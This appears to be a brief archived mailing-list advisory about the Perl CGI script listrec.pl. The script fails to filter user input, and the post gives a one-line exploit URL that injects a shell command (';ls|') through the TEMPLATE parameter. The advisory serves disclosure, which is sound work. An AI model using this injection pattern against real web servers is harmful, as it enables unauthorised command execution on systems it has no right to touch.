Last update (of listrec.pl) Jon Wright 11/11/1998. This script has vulnerability (does not filter input of the user) which allows to carry out commands from WebServer. EXPLOIT: www.server.com/cgi-bin/common/listrec.pl? APP=qmh-news&TEMPLATE=;ls| XP-TEAM
This archive was generated by hypermail 2b30 : Tue Sep 11 2001 - 21:13:18 PDT